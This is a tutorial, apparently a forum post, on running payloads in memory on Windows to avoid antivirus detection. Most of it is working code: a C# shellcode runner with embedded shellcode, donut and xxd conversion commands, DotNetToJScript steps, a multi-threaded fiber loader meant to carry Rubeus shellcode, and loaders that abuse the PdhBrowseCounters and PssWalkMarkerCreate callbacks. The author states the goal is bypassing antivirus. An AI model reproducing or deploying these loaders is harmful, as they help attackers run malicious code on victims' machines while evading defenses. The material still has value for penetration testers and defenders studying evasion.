The Disk Is Lava: Exploring Methods for Executing Payloads in Memory. PART 2

Tr0jan_Horse

We have learned how to execute .NET assemblies, but what if the program is written in C++? In that case it runs outside the CLR and is considered unmanaged code. As a consequence, you cannot execute it in memory using the methods described above.

It's too early to give up, though, because there is shellcode. What if we generate shellcode from an existing C++ program and then embed it in a C# project that implements the logic for injecting this shellcode into the address space of the current process? In this case, we get a full-fledged assembly that is loaded using System.Reflection.Assembly.Load() and executes our shellcode. The result is a matryoshka of four dolls: the Assembly.Load() call is the first doll, the loaded assembly is the second, the shellcode inside the assembly is the third, and the C++ program wrapped in that shellcode is the fourth.

So, first, I suggest preparing a program that will launch our shellcode. Here we will use a standard shellcode runner based on GetDelegateForFunctionPointer():
C#:
using System;
using System.Runtime.InteropServices;
 
namespace ShellcodeLoader
{
    public class Program
    {
        public static void Main(string[] args)
        {
            byte[] x86shc = new byte[193] {
            0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
            0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
            0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
            0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
            0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
            0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
            0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
            0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
            0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
            0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
            0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
            0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
            0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };
 
            IntPtr funcAddr = VirtualAlloc(
                              IntPtr.Zero,
                              (uint)x86shc.Length,
                              0x1000, 0x40);
            Marshal.Copy(x86shc, 0, (IntPtr)(funcAddr), x86shc.Length);
            pFunc f = (pFunc)Marshal.GetDelegateForFunctionPointer(funcAddr, typeof(pFunc));
            f();
 
            return;
        }
 
        #region pinvokes
        [DllImport("kernel32.dll")]
        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        delegate void pFunc();
 
        #endregion
    }
}
Now convert the bytes of this assembly into a Base64 string using the algorithm described above and run it through System.Reflection.Assembly:
1746985563562.png

All right! The test shellcode runs. It's time to move on to generating the shellcode itself. First, let's choose a program. I suggest writing something reasonably substantial to test the theory properly. Let's use graphics, various API calls, loops, callbacks, and so on:
1746985646495.png
C++:
#include <Windows.h>

LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
 
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    HWND hwnd;
    WNDCLASSEX wc = { sizeof(WNDCLASSEX), CS_HREDRAW | CS_VREDRAW, WindowProc, 0, 0, hInstance, NULL, LoadCursor(NULL, IDC_ARROW), NULL, NULL, L"MyWindowClass", NULL };
    RegisterClassEx(&wc);
    hwnd = CreateWindowEx(0, L"MyWindowClass", L"Pixel Drawing", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 800, 600, NULL, NULL, hInstance, NULL);
    ShowWindow(hwnd, nCmdShow);
 

    HDC hdc = GetDC(hwnd);
 
    // Draw the pixels
    for (int x = 0; x < 800; x++)
    {
        for (int y = 0; y < 600; y++)
        {
            SetPixel(hdc, x, y, RGB(x % 256, y % 256, (x + y) % 256)); // Set the pixel color
        }
    }
 
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
 

    ReleaseDC(hwnd, hdc);
    UnregisterClass(L"MyWindowClass", hInstance);
    return 0;
}
 
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0);
        return 0;
    }
 
    return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
Then compile it and convert the resulting program into shellcode. There are many ready-made tools for this.
You can even use Visual Studio to generate shellcode; this is described in detail in this article. I am a simple person, so I suggest using the standard donut:

Bash:
donut.exe -i CodeToShc.exe -o code.bin -b 1
1746986209550.png

Then convert the .bin file into a hexadecimal byte array that can be pasted into the program:

Bash:
xxd -i code.bin > 1.h

The file will contain the shellcode of our program:
1746986299295.png
We add the shellcode to the shellcode runner and check that everything works:
1746986381917.png
All that remains is to get the assembly bytes and run that assembly via System.Reflection.Assembly:

1746986601195.png
And the loaded assembly successfully executes the shellcode:
1746986692388.png
With the shellcode launched this way, the antivirus in this test did not detect the injection:
1746986727821.png

JScript conversion

There is a method of running .NET assemblies by converting them to JScript. The following tool is used for this purpose: https://github.com/tyranid/DotNetToJScript.

First of all, download the project from the link above, open it in Visual Studio, go to Solution Explorer, and open TestClass.cs in the ExampleAssembly project. Set the project to compile as a .dll.
1746986808146.png
Then insert our code into the TestClass class. For example, the following code shows a message box:
C#:
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;

[ComVisible(true)]
public class TestClass
{
    public TestClass()
    {
        MessageBox.Show("Test", "Test", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
    }

    public void RunProcess(string path)
    {
        Process.Start(path);
    }
}
After the project compiles successfully to a .dll, use the toolkit downloaded above to convert it to JS:
Bash:
DotNetToJScript.exe <DLL Name> --lang=Jscript --ver=<version of the .NET Framework> -o demo.js

# Example
DotNetToJScript.exe ExampleAssembly.dll --lang=Jscript --ver=v4 -o demo.js
The resulting .js file can then be run, which executes the code in the TestClass() constructor, namely, it shows the MessageBox.

Fibers


Fibers are a unit of code execution, like a process or a thread. A fiber runs inside a particular thread, which gives the hierarchy process → thread → fiber, and one thread can host several fibers. Fibers are scheduled by the application itself, not by the operating system. Because each fiber has its own stack and register context, fibers allow you to build more flexible synchronization mechanisms. They are also convenient for hiding code execution, because code running inside a fiber is much harder to track than code running directly in a thread. The most interesting thing is that the fiber's stack is cleared as soon as the fiber finishes its work. As a result, it is harder for antivirus software to detect malicious activity in our program.

If, however, one fiber switches to another fiber, the stack is not cleared. Instead, the stack and register values are switched to those belonging to the fiber being switched to. For example, if the main thread has 0x00 in EAX, fiber 1 has 0x01, and fiber 2 has 0x02, then when the main thread switches to fiber 1, EAX becomes 0x01, and when fiber 1 switches to fiber 2, it becomes 0x02. When fiber 2 completes, the value from fiber 1 is restored, and so on.

C++:
LPVOID CreateFiber(
  [in]           SIZE_T                dwStackSize,
  [in]           LPFIBER_START_ROUTINE lpStartAddress,
  [in, optional] LPVOID                lpParameter
);

Ideally, to hide the payload from AV you should place it somewhere in a file - for example, in the PE itself, in a neighboring DLL, or somewhere else. Then start a bunch of threads, a bunch of fibers in them, and run the payload in one of the fibers.

Fibers are supported in both C# and C++. For a change, I suggest writing this PoC in C++. The main function for working with fibers is CreateFiber(), whose prototype is shown above:
  • dwStackSize - initial committed stack size, in bytes
  • lpStartAddress - callback function of type LPFIBER_START_ROUTINE, which serves as the fiber's main function. It is called when the fiber starts
  • lpParameter - some additional data that we want to pass to the fiber

Once the fiber is created, it can be started using SwitchToFiber(). Note that you cannot call this function directly from an ordinary thread - control will not be switched. Therefore, you need to convert the current thread to a fiber using ConvertThreadToFiber() beforehand.

Fibers are well suited to executing our payloads in memory because of their fairly good stealth. I propose to start with a simple PoC with ten threads and ten fibers in each, where only one of the fibers runs our shellcode.

For synchronization I propose to use a mutex. Let's create the mutex at the beginning of the program and then acquire it before launching the shellcode to prevent repeated launches.
C++:
#include <windows.h>
#include <vector>
#include <thread>
 
#define DEBUG
 
size_t numOfThreads = 10;
size_t numOfFibers = 10;
 
unsigned char shc[] = "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
"\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
"\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
"\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
"\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
"\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
"\x48\x83\xec\x20\x41\xff\xd6,\x00";
 
DWORD WINAPI threadProc(VOID*);
VOID WINAPI fiberProc(LPVOID);
 
HANDLE hMutex;
 
int main() {
    std::vector<HANDLE> threads(numOfThreads);
    hMutex = CreateMutex(NULL, FALSE, L"Mutex");
    for (auto& thread : threads)
    {
        thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)threadProc, NULL, 0, NULL);
    }
 
    for (auto& thread : threads)
    {
        WaitForSingleObject(thread, INFINITE);
    }
 
 
    return 0;
}
 
DWORD WINAPI threadProc(LPVOID lpParam) {
    std::vector<PVOID> fibers(numOfFibers);
    ConvertThreadToFiber(NULL);
 
 
 
    for (int i = 0; i < numOfFibers; ++i)
    {
        fibers[i] = CreateFiber(0, (LPFIBER_START_ROUTINE)fiberProc, (LPVOID)i);
        
    }
 
    while (true)
    {
        for (auto& fiber : fibers)
        {
            SwitchToFiber(fiber);
        }
    }
 
    return 0;
}
 
VOID WINAPI fiberProc(LPVOID lpParam) {
    WaitForSingleObject(hMutex, INFINITE);
    hMutex = OpenMutex(MUTEX_ALL_ACCESS, FALSE, L"Mutex");
    if (hMutex)
    {
        PVOID payload_mem = VirtualAlloc(0, sizeof(shc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(payload_mem, shc, sizeof(shc));
        ((void(*)())payload_mem)();
    }
 }
All that remains is to replace the shellcode with the Rubeus shellcode. With this much code hiding, the code again executes in memory and, in this test, stays out of the antivirus's sight:
1746987232849.png

Special Loaders

There is a whole class of programs, so-called reflective loaders, that load code into memory. Reflective loading is based on the developer implementing the algorithm for mapping a PE file into memory himself - just as Windows does, or at least well enough for the payload to start.

There are quite a lot of ready-made PoCs on GitHub. I will highlight the most interesting ones:
  • Invoke-ReflectivePEInjection - a PowerShell variant
  • RunPE - suitable for running both managed and unmanaged code
  • FilelessPELoader - one of the smartest implementations. Pulls the payload from a remote server
A separate class of programs is used for reflective DLL injection:
  • post/windows/manage/reflective_dll_inject - MSF module
  • ReflectiveDllInjection
However, sometimes all these special loaders are unnecessary. In most pentest cases, it is enough to convert a program into shellcode and then get the system to execute it somehow. And if you go off the beaten path and use a previously unknown method of running shellcode, you will most likely be able to bypass the antivirus.
For example, you can look for functions that accept a callback as one of their parameters. Many Windows GUI functions accept callbacks. For example, PdhBrowseCounters() displays a dialog box in which the user selects performance counters of interest to a resource monitoring program. The function takes a PDH_BROWSE_DLG_CONFIG structure, one of whose members is pCallBack.

The only problem is that this callback is called only after the user selects the desired performance counters. However, we can make the selection for the user and then use SendMessage() to simulate the click on the dialog's OK button.
C++:
#include <windows.h>
#include <pdh.h>
#include <pdhmsg.h>
#include <stdio.h>
#include <iostream>
 
#pragma comment(lib, "pdh.lib")
 
 
 
DWORD WINAPI ThreadFunction(LPVOID lpParam)
{
    Sleep(5000);
    HWND hwnd = NULL;
    hwnd = FindWindow(NULL, L"s");
    ShowWindow(hwnd, SW_HIDE);
    if (hwnd)
    {
        HWND hwndButton = FindWindowEx(hwnd, NULL, L"Button", L"ОК"); // OK RUssian
 
        if (hwndButton)
        {
            SendMessage(hwndButton, BM_CLICK, 0, 0);
        }
        else {
            hwndButton = FindWindowEx(hwnd, NULL, L"Button", L"OK"); // OK English
            if (hwndButton) {
                SendMessage(hwndButton, BM_CLICK, 0, 0);
            }
            else {
                std::cout << "[-] Cant get handle on button" << std::endl;
            }
        }
    }
    return 0;
}
void ShowCounterBrowser()
{
 
    PDH_BROWSE_DLG_CONFIG dlg;
 
    ZeroMemory(&dlg, sizeof(PDH_BROWSE_DLG_CONFIG));
    unsigned char AbcdVar[] = "<SHELLCODE HERE>";
    PVOID addr = VirtualAlloc(0, sizeof(AbcdVar), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(addr, AbcdVar, sizeof(AbcdVar));
    dlg.pCallBack = (CounterPathCallBack)addr;
    dlg.dwCallBackArg = NULL;
 
    dlg.bIncludeInstanceIndex = FALSE;
    dlg.bSingleCounterPerAdd = TRUE;
    dlg.bSingleCounterPerDialog = TRUE;
    dlg.bLocalCountersOnly = FALSE;
    dlg.bWildCardInstances = TRUE;
    dlg.bHideDetailBox = TRUE;
    dlg.bInitializePath = FALSE;
    dlg.dwDefaultDetailLevel = PERF_DETAIL_WIZARD;
    dlg.szReturnPathBuffer = new wchar_t[PDH_MAX_COUNTER_PATH + 1];
    dlg.cchReturnPathLength = PDH_MAX_COUNTER_PATH;
    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
 
    if (PdhBrowseCounters(&dlg) == ERROR_SUCCESS)
    {
        printf("Chosen counter: %s\n", dlg.szReturnPathBuffer);
    }
    else
    {
        printf("No counter chosen\n");
    }
 
    delete[] dlg.szReturnPathBuffer;
}
 
int main()
{
    ShowCounterBrowser();
    return 0;
}

Another option is PssCaptureSnapshot(), which creates process snapshots. To get information about a snapshot, you can then walk it using a walk marker created with PssWalkMarkerCreate(), which takes a PSS_ALLOCATOR structure as its first parameter, with callbacks specified inside. These callbacks exist for custom implementations of the memory allocation and release functions used while the system works with the snapshot, but nothing prevents us from pointing them at our shellcode:
C++:
#include <Windows.h>
#include <processsnapshot.h>
#include <iostream>
 
// Function To Rewrite
VOID* CALLBACK AllocRoutine(void* Context, DWORD Size)
{
    MessageBox(NULL, L"AllocRoutine function is called!", L"Information", MB_ICONINFORMATION);
    return (HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, Size));
}
 
int main()
{
    DWORD ProcessId = GetCurrentProcessId();
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    if (hProcess == NULL)
    {
        std::cerr << "Could not open the process." << std::endl;
        return 1;
    }
 
    HPSS SnapshotHandle = NULL;
    PSS_CAPTURE_FLAGS CaptureFlags = PSS_CAPTURE_NONE;
    DWORD SnapshotFlags = 0;
    DWORD Result = PssCaptureSnapshot(hProcess, CaptureFlags, SnapshotFlags, &SnapshotHandle);
    if (Result != ERROR_SUCCESS)
    {
        std::cerr << "Could not create the process snapshot. Error: " << Result << std::endl;
        return 1;
    }
 
    PSS_ALLOCATOR Allocator;
 
    Allocator.AllocRoutine = AllocRoutine;
    Allocator.FreeRoutine = NULL;
    unsigned char shellcode[] = "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b"
        "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2"
        "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b"
        "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04"
        "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0"
        "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2"
        "\x48\x83\xec\x20\x41\xff\xd6,\x00";
    DWORD old;
    VirtualProtect(AllocRoutine, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &old);
    memcpy(AllocRoutine, shellcode, sizeof(shellcode));
    HPSSWALK WalkMarkerHandle;
    Result = PssWalkMarkerCreate(&Allocator, &WalkMarkerHandle);
    if (Result != ERROR_SUCCESS)
    {
        std::cerr << "Could not create the walk marker. Error: " << Result << std::endl;
        return 1;
    }
    PssFreeSnapshot(GetCurrentProcess(), SnapshotHandle);
    CloseHandle(hProcess);
    return 0;
}
As you can see, there is plenty of room for imagination here. The most important thing is not to be afraid to experiment and create.

Conclusion

To summarize, in-memory execution methods usually come down either to using features of a programming language that allow operations to be performed without touching the disk, or to generating shellcode from an executable program. On the other hand, it is bad practice to keep shellcode in plain form, so you need to mask it by all available means, but we will talk about this next time.
 